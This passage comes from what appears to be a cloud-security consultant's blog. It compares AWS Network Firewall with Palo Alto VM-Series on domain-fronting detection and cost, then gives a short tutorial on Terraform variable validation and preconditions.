The detection works because Palo Alto inspects both the certificate's Common Name / Subject Alternative Name fields AND the SNI, and can automatically deny sessions where they don't match. AWS Network Firewall only gained similar capability through TLS inspection - and as noted above, with limitations.

What Palo Alto doesn't solve

I'm not going to pretend VM-Series is perfect. Here's what you're signing up for:

You manage EC2 instances. VM-Series runs on EC2. You're responsible for instance sizing, patching PAN-OS, HA configuration, and monitoring. When Palo Alto releases a critical security update (and they do - CVE-2024-9468 was a DoS vulnerability in the threat prevention engine), you're the one applying it.

Gateway Load Balancer complexity. The recommended production architecture uses a centralized Security VPC with a Gateway Load Balancer distributing traffic across VM-Series instances. This means GENEVE encapsulation, appliance mode on Transit Gateway attachments, four separate subnets per AZ in the Security VPC (management, data, TGW, public), and careful route table configuration. It works beautifully when set up correctly. Getting there is not trivial.

Cost. A VM-Series PAYG instance on the AWS Marketplace starts at $1.71/hour for a c5n.xlarge (the recommended instance type). That's the software license alone - add the EC2 instance cost on top. For HA (which you want in production), double it. For multi-AZ, multiply again.

Domain fronting detection requires SSL Decryption. Threat ID 86467 only works when the traffic is decrypted - either through SSL Forward Proxy or SSL Inbound Inspection. Without decryption, the firewall can't see the HTTP Host header to compare it against the SNI. By default, the signature action is allow with informational severity - you need to explicitly create a threat exception to block it.

The cost math

Let's compare a realistic production scenario: a centralized Security VPC in eu-central-1, two AZs, processing 500 GB of traffic per month.

AWS Network Firewall (with TLS inspection)

Component	Monthly cost
2 firewall endpoints x $0.489/h x 730h	$714
500 GB x $0.065/GB	$33
Total	~$747/month

Palo Alto VM-Series (PAYG, HA pair)

Component	Monthly cost
2 x VM-Series license x $1.71/h x 730h	$2,497
2 x c5n.xlarge EC2 x ~$0.34/h x 730h	$496
Gateway Load Balancer x $0.0125/h x 730h	$9
GWLB data x $0.004/GB x 500 GB	$2
Total	~$3,004/month

That's a 4x cost difference. For some organizations, the additional security capabilities justify this. For others, they absolutely don't.

The breakeven conversation is not about GB processed - it's about what a security incident would cost you. If you're a fintech handling payment data, $3,000/month for a firewall that can actually detect domain fronting is cheap. If you're running internal dev tooling, AWS Network Firewall with TLS inspection is plenty.

When to use which

Scenario	Recommendation	Why
Internal workloads, basic egress filtering	AWS Network Firewall	Simple, cheap, managed
Multi-VPC with centralized inspection	Either - depends on budget	Both support Transit Gateway architectures
PCI-DSS, HIPAA, SOX compliance	VM-Series	App-ID, granular logging, proven compliance track record
Hybrid cloud (AWS + on-prem)	VM-Series	Same policies, same Panorama management plane
Domain fronting / C2 detection required	VM-Series	Built-in detection (Threat ID 86467)
Budget under $1,000/month for firewall	AWS Network Firewall	VM-Series can't compete on price
Team without Palo Alto expertise	AWS Network Firewall + TLS inspection	VM-Series has a learning curve
Existing Palo Alto on-prem investment	VM-Series	Reuse policies, skills, and Panorama

What I actually recommend to clients

I don't tell every client to deploy Palo Alto. That would be irresponsible.

For most startups and SMBs I work with, I recommend AWS Network Firewall with TLS inspection enabled from day one. It covers 90% of use cases, costs a fraction of VM-Series, and doesn't require specialized Palo Alto expertise to maintain.

But I always make sure they understand what it doesn't catch. I walk them through the SNI bypass scenario. I explain the ECH/QUIC gaps. And if they're in a regulated industry, or if they've had a security incident involving data exfiltration, or if they already run Palo Alto on-premises - then we talk about VM-Series and the centralized Security VPC architecture with Gateway Load Balancer.

The worst outcome is deploying AWS Network Firewall with a domain allowlist and believing you're protected against data exfiltration. You're not. You're protected against accidental connections to the wrong domain. A determined attacker will walk right through it without TLS inspection - and even with TLS inspection, there are gaps.

Security architecture is about understanding what your controls actually stop, and what they don't.

Sources

Jianjun Huo, "AWS Network Firewall egress filtering can be easily bypassed", September 2023 (updated February 2025)
Hacking the Cloud, "AWS Network Firewall Egress Filtering Bypass"
AWS Documentation, "TLS inspection considerations"
AWS, "Network Firewall Pricing"
AWS re:Post, "Prevent AWS Network Firewall host header spoofing"
MITRE ATT&CK, "Domain Fronting T1090.004"
Palo Alto Networks, "Domain Fronting Detection - PAN-OS 10.2"
Palo Alto Networks, "How Palo Alto Networks identifies HTTPS applications without decryption"
Palo Alto Networks, "VM-Series Integration with AWS Gateway Load Balancer"
AWS Marketplace, "VM-Series Next-Gen Virtual Firewall PAYG"
Palo Alto Networks LIVEcommunity, "How to detect domain fronting"

Designing a Security VPC for AWS with centralized traffic inspection? I've done this for enterprise clients across multiple industries. Let's talk.

Why Every Terraform Module Needs Proper Validation

Mariusz Gębala — Thu, 05 Mar 2026 11:01:13 +0000

If you've ever deployed a Terraform module only to discover that someone passed a private subnet ID where a public one was expected, you know the pain. The deployment "succeeds", but nothing works. You spend 30 minutes debugging, only to realize the input was wrong from the start.

Terraform has tools to prevent this. Most people don't use them.

The Problem: Silent Misconfiguration

Consider a simple NAT Gateway module:

variable "subnet_id" {
  description = "Subnet to place the NAT Gateway in"
  type        = string
}

resource "aws_nat_gateway" "this" {
  allocation_id = aws_eip.this.id
  subnet_id     = var.subnet_id
}

This accepts any subnet ID. Public, private, doesn't matter. Terraform won't complain. AWS won't complain (immediately). But your private subnets won't have internet access, and you'll spend time figuring out why.

The Fix: Validation Blocks

Since Terraform 1.0, you can add validation blocks to variables:

variable "public_subnet_ids" {
  description = "Public subnet IDs for NAT Gateway placement"
  type        = list(string)

  validation {
    condition     = length(var.public_subnet_ids) > 0
    error_message = "At least one public subnet ID is required."
  }

  validation {
    condition     = alltrue([for id in var.public_subnet_ids : startswith(id, "subnet-")])
    error_message = "All values must be valid subnet IDs (starting with 'subnet-')."
  }
}

Now terraform plan fails immediately with a clear message if someone passes an empty list or garbage values.

Going Further: Preconditions

For validations that need to check relationships between variables, use precondition blocks in lifecycle:

resource "aws_nat_gateway" "this" {
  count = var.single_nat_gateway ? 1 : length(var.public_subnet_ids)

  allocation_id = aws_eip.this[count.index].id
  subnet_id     = var.public_subnet_ids[count.index]

  lifecycle {
    precondition {
      condition     = var.single_nat_gateway || length(var.public_subnet_ids) >= length(var.private_route_table_ids)
      error_message = "When using multi-AZ NAT, you need at least as many public subnets as private route tables."
    }
  }
}

This catches architectural mistakes at plan time, not after a 10-minute apply.

What I Validate in Every Module

After building 12 Terraform modules for AWS, here's my checklist:

What	Why
Non-empty required lists	Prevents silent no-ops
ID format (`subnet-`, `vpc-`, `sg-`)	Catches copy-paste errors
CIDR block format	Regex validation on network inputs
Mutually exclusive flags	e.g., `single_nat_gateway` vs per-AZ mode
Cross-variable consistency	Preconditions on resource blocks

The Payoff

Every validation you add is one fewer support ticket, one fewer "why isn't this working" Slack message, and one fewer hour lost to debugging obvious misconfigurations.

The best part: these validations run during terraform plan. Zero cost. Zero risk. Just faster feedback.

Building Terraform modules for AWS? Check out the HAIT module collection on the Terraform Registry.